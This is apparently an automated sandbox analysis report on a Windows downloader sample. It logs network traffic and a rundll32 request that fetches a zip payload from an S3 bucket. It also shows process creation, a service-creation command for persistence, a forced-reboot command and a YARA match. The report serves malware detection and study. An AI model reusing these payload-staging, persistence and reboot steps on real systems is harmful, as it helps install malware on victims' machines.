                                                  Mar 7, 2024 10:47:32.357228041 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.357281923 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.357439041 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.357456923 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.357481956 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.357486963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.357505083 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.357521057 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.357851982 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.358197927 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.358211994 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.358251095 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.690427065 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.690443993 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.691277027 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.691298008 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.691338062 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.691343069 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.691373110 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.691387892 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.692167044 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.692186117 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.692231894 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.692238092 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.692249060 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.692316055 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693082094 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.693100929 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.693150043 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693156004 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.693183899 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693200111 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.693963051 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694040060 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694051027 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694055080 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694080114 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694099903 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694705963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694725037 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694757938 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694763899 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.694788933 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.694808006 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.695702076 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.695719957 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.695785046 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.695790052 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.695823908 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.696631908 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.696650982 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.696710110 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.696716070 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.696753025 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.697491884 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.697510958 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.697545052 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.697550058 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.697577953 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.697592974 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.698255062 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.698302984 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.698312998 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.698317051 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.698350906 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699129105 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699147940 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699182034 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699186087 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699214935 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699234962 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699912071 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699939013 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.699970961 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.699976921 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700002909 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700016975 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700851917 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700874090 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700920105 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700926065 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.700952053 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.700963974 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.701754093 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.701778889 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.701813936 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.701818943 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.701843977 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.701859951 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.702605963 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.702625990 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.702665091 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.702670097 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.702682972 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.702707052 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.703336954 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.703360081 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.703394890 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.703401089 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.703429937 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.703443050 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.704451084 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.704471111 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.704504013 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.704509020 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.704530001 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.704549074 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.705450058 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.705470085 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.705507994 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.705513000 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.705529928 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.705545902 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.706609964 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.706629992 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.706675053 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.706681013 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.706707954 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.706720114 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.707802057 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.707829952 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.707859039 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.707864046 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.707890987 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.707907915 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.708853960 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.708878040 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.708910942 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.708916903 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.708940983 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.708956957 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.709625959 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.709644079 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.709681034 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.709686041 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.709721088 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.709733963 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710138083 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710180998 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710197926 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710203886 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710222006 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710239887 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710268021 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:32.710309982 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710483074 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:32.710499048 CET443497053.5.232.137192.168.2.5
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Mar 7, 2024 10:47:27.663292885 CET | 55313 | 53 | 192.168.2.5 | 1.1.1.1
                                                  Mar 7, 2024 10:47:27.890398026 CET | 53 | 55313 | 1.1.1.1 | 192.168.2.5
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                  Mar 7, 2024 10:47:27.663292885 CET | 192.168.2.5 | 1.1.1.1 | 0x726d | Standard query (0) | bucreate203920233.s3.sa-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | bucreate203920233.s3.sa-east-1.amazonaws.com | s3-r-w.sa-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.232.137 | A (IP address) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 3.5.233.174 | A (IP address) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 52.95.164.19 | A (IP address) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.2.26 | A (IP address) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.22 | A (IP address) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.66 | A (IP address) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.0.18 | A (IP address) | IN (0x0001) | false
                                                  Mar 7, 2024 10:47:27.890398026 CET | 1.1.1.1 | 192.168.2.5 | 0x726d | No error (0) | s3-r-w.sa-east-1.amazonaws.com | | 16.12.1.6 | A (IP address) | IN (0x0001) | false
                                                  • bucreate203920233.s3.sa-east-1.amazonaws.com
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.5 | 49705 | 3.5.232.137 | 443 | 7520 | C:\Windows\System32\rundll32.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-03-07 09:47:29 UTC | 336 | OUT | GET /bucketTc.zip HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: bucreate203920233.s3.sa-east-1.amazonaws.com
                                                  Connection: Keep-Alive
                                                  2024-03-07 09:47:29 UTC | 435 | IN | HTTP/1.1 200 OK
                                                  x-amz-id-2: 5cJSVvyLB5RHgBQRrWVM+6ZvMIFI0PimtUp9Tz6vkUz1TqSuTXSuIjZ2R8iX42XcD+odmbZ7b1oG7xi57zvteg==
                                                  x-amz-request-id: FXBQ0XJZAYDE6RHP
                                                  Date: Thu, 07 Mar 2024 09:47:30 GMT
                                                  Last-Modified: Wed, 06 Mar 2024 05:27:41 GMT
                                                  ETag: "b952a1b57aae836929b07ee6b6306c61"
                                                  x-amz-server-side-encryption: AES256
                                                  Accept-Ranges: bytes
                                                  Content-Type: application/zip
                                                  Server: AmazonS3
                                                  Content-Length: 7426462
                                                  Connection: close


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:10:47:18
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:6'569'472 bytes
                                                  MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:10:47:18
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
                                                  Imagebase:0xe0000
                                                  File size:6'569'472 bytes
                                                  MD5 hash:9E1E30202D950CE1F273EB2E8492F39B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:10:47:19
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
                                                  Imagebase:0x150000
                                                  File size:1'899'520 bytes
                                                  MD5 hash:A560BAD9E373EA5223792D60BEDE2B13
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:10:47:21
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
                                                  Imagebase:0xed0000
                                                  File size:89'392 bytes
                                                  MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:10:47:21
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:10:47:22
                                                  Start date:07/03/2024
                                                  Path:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
                                                  Imagebase:0xed0000
                                                  File size:89'392 bytes
                                                  MD5 hash:436CEDFA08F245AD52DD221BEC4480A4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:9
                                                  Start time:10:47:22
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:10
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:11
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:12
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                                  Imagebase:0xf40000
                                                  File size:61'440 bytes
                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:13
                                                  Start time:10:47:25
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\rundll32.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
                                                  Imagebase:0x7ff701af0000
                                                  File size:71'680 bytes
                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:14
                                                  Start time:10:47:35
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                                  Imagebase:0x7ff7018f0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:10:47:35
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:10:47:35
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
                                                  Imagebase:0x7ff72cce0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:10:47:44
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\shutdown.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                  Imagebase:0x7ff600fb0000
                                                  File size:28'160 bytes
                                                  MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:10:47:44
                                                  Start date:07/03/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:11%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:6.4%
                                                    Total number of Nodes:78
                                                    Total number of Limit Nodes:2
                                                    execution_graph 319 eab5c 322 eb0b8 319->322 321 eab61 321->321 323 eb0ce 322->323 325 eb0d7 323->325 326 eb06b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 323->326 325->321 326->325 327 e9c2d 328 e9c37 327->328 329 ea090 ___delayLoadHelper2@8 14 API calls 328->329 329->328 330 e9cbd 331 e9c8e 330->331 331->330 332 ea090 ___delayLoadHelper2@8 14 API calls 331->332 332->331 252 e9cdb 253 e9c8e 252->253 255 ea090 253->255 281 e9df1 255->281 257 ea0a0 258 ea0fd 257->258 259 ea121 257->259 290 ea02e 258->290 262 ea199 LoadLibraryExA 259->262 264 ea1fa 259->264 265 ea20c 259->265 275 ea2c8 259->275 263 ea1ac GetLastError 262->263 262->264 267 ea1bf 263->267 268 ea1d5 263->268 264->265 266 ea205 FreeLibrary 264->266 269 ea26a GetProcAddress 265->269 265->275 266->265 267->264 267->268 270 ea02e DloadReleaseSectionWriteAccess 6 API calls 268->270 271 ea27a GetLastError 269->271 269->275 272 ea1e0 RaiseException 270->272 273 ea28d 271->273 276 ea2f6 272->276 273->275 277 ea02e DloadReleaseSectionWriteAccess 6 API calls 273->277 274 ea02e DloadReleaseSectionWriteAccess 6 API calls 274->276 275->274 276->253 278 ea2ae RaiseException 277->278 279 e9df1 DloadAcquireSectionWriteAccess 6 API calls 278->279 280 ea2c5 279->280 280->275 282 e9dfd 281->282 283 e9e23 281->283 298 e9e97 282->298 283->257 286 e9e1e 306 e9e24 286->306 291 ea062 RaiseException 290->291 292 ea040 290->292 291->276 293 e9e97 DloadReleaseSectionWriteAccess 3 API calls 292->293 294 ea045 293->294 295 ea05d 294->295 296 e9fc0 DloadProtectSection 3 API calls 294->296 316 ea064 295->316 296->295 299 e9e24 DloadGetSRWLockFunctionPointers 3 API calls 298->299 300 e9e02 299->300 300->286 301 e9fc0 300->301 303 e9fd5 DloadObtainSection 301->303 302 e9fdb 302->286 303->302 304 ea010 VirtualProtect 303->304 312 e9ed6 VirtualQuery 303->312 304->302 307 e9e47 306->307 308 e9e32 306->308 307->257 308->307 309 e9e36 
GetModuleHandleW 308->309 309->307 310 e9e4b GetProcAddress 309->310 310->307 311 e9e5b GetProcAddress 310->311 311->307 313 e9ef1 312->313 314 e9efc GetSystemInfo 313->314 315 e9f33 313->315 314->315 315->304 315->315 317 e9e24 DloadGetSRWLockFunctionPointers 3 API calls 316->317 318 ea069 317->318 318->291 340 e9c52 341 e9c37 340->341 341->340 342 ea090 ___delayLoadHelper2@8 14 API calls 341->342 342->341 343 e9cb3 344 e9c8e 343->344 345 ea090 ___delayLoadHelper2@8 14 API calls 344->345 345->344 346 e9d21 347 e9d2b 346->347 348 ea090 ___delayLoadHelper2@8 14 API calls 347->348 349 e9d38 348->349

                                                    Callgraph

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 5 e9cbd-e9cc2 6 e9c8e-e9c96 call ea090 5->6 8 e9c9b-e9c9c 6->8 8->5
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 000E9C96
                                                      • Part of subcall function 000EA090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000EA09B
                                                      • Part of subcall function 000EA090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EA103
                                                      • Part of subcall function 000EA090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EA114
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2009734496.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
